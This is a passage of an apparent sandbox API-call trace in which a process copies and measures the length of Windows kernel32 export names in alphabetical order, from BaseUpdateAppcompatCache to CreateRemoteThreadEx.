lpString1=0x31cec6c, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0178.448] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0178.448] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0178.448] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0178.448] lstrcpyA (in: lpString1=0x31cec6c, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0178.448] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0178.448] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0178.448] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0178.448] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0178.448] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0178.448] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0178.448] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0178.448] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0178.448] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0178.448] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0178.448] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0178.448] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0178.448] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0178.448] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0178.448] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0178.448] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0178.448] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0178.448] lstrcpyA (in: lpString1=0x31cec6c, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0178.448] lstrlenA (lpString="BEEP") returned 4 [0178.448] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0178.448] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0178.448] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0178.448] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0178.448] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0178.448] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0178.448] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0178.448] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0178.448] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0178.448] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0178.449] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0178.449] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0178.449] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0178.449] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0178.449] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0178.449] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0178.449] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0178.449] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0178.449] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0178.449] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0178.449] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0178.449] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0178.449] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0178.449] lstrlenA (lpString="CANCELIO") returned 8 [0178.449] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0178.449] lstrlenA (lpString="CANCELIOEX") returned 10 [0178.449] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0178.449] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0178.449] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0178.449] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0178.449] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0178.449] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0178.449] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0178.449] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0178.449] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0178.449] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0178.449] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0178.449] lstrlenA (lpString="CHECKELEVATION") returned 14 [0178.449] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0178.449] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0178.449] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0178.449] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0178.449] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0178.449] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0178.449] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0178.449] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0178.449] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0178.449] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0178.450] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0178.450] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0178.450] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0178.450] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0178.450] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0178.450] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0178.450] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0178.450] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0178.450] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0178.450] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0178.450] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0178.450] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0178.450] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0178.450] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0178.450] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0178.450] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0178.450] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0178.450] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0178.450] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0178.450] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0178.450] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0178.450] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0178.450] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0178.450] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0178.450] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0178.450] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0178.450] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0178.450] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0178.450] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0178.450] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0178.450] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0178.450] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0178.450] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0178.450] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0178.450] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0178.450] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0178.450] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0178.450] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0178.451] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0178.451] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0178.451] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0178.451] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0178.451] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0178.451] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0178.451] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0178.451] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0178.451] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0178.451] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0178.451] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0178.451] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0178.451] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0178.451] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0178.451] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0178.451] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0178.451] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0178.451] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0178.451] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0178.451] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0178.451] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0178.451] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0178.451] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0178.451] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0178.451] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0178.451] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0178.451] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0178.451] lstrlenA (lpString="COPYCONTEXT") returned 11 [0178.451] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0178.451] lstrlenA (lpString="COPYFILEA") returned 9 [0178.451] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0178.451] lstrlenA (lpString="COPYFILEEXA") returned 11 [0178.451] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0178.451] lstrlenA (lpString="COPYFILEEXW") returned 11 [0178.451] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0178.451] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0178.451] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0178.451] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0178.452] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0178.452] lstrlenA (lpString="COPYFILEW") returned 9 [0178.452] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0178.452] lstrlenA (lpString="COPYLZFILE") returned 10 [0178.452] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0178.452] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0178.452] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0178.452] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0178.452] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0178.452] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0178.452] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0178.452] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0178.452] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0178.452] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0178.452] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0178.452] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0178.452] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0178.452] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0178.452] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0178.452] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0178.452] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0178.452] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0178.452] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0178.452] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0178.452] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0178.452] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0178.452] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0178.452] lstrlenA (lpString="CREATEEVENTA") returned 12 [0178.452] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0178.452] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0178.452] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0178.452] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0178.452] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0178.452] lstrlenA (lpString="CREATEEVENTW") returned 12 [0178.452] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0178.452] lstrlenA (lpString="CREATEFIBER") returned 11 [0178.452] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0178.452] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0178.453] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0178.453] lstrlenA (lpString="CREATEFILEA") returned 11 [0178.453] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0178.453] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0178.453] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0178.453] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0178.453] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0178.453] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0178.453] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0178.453] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0178.453] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0178.453] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0178.453] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0178.453] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0178.453] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0178.453] lstrlenA (lpString="CREATEFILEW") returned 11 [0178.453] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0178.453] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0178.453] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0178.453] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0178.453] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0178.453] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0178.453] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0178.453] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0178.453] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0178.453] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0178.453] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0178.453] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0178.453] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0178.453] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0178.453] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0178.453] lstrlenA (lpString="CREATEJOBSET") returned 12 [0178.453] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0178.453] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0178.453] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0178.453] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0178.453] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0178.454] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0178.454] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0178.454] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0178.454] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0178.454] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0178.454] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0178.454] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0178.454] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0178.454] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0178.454] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0178.454] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0178.454] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0178.454] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0178.454] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0178.454] lstrlenA (lpString="CREATEPIPE") returned 10 [0178.454] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0178.454] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0178.454] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0178.454] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0178.454] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0178.454] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0178.454] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0178.454] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0178.454] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0178.454] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0178.454] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0178.454] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0178.454] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0178.454] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0178.454] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0178.454] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0178.454] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0178.454] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0178.454] lstrcpyA (in: lpString1=0x31cec6c, 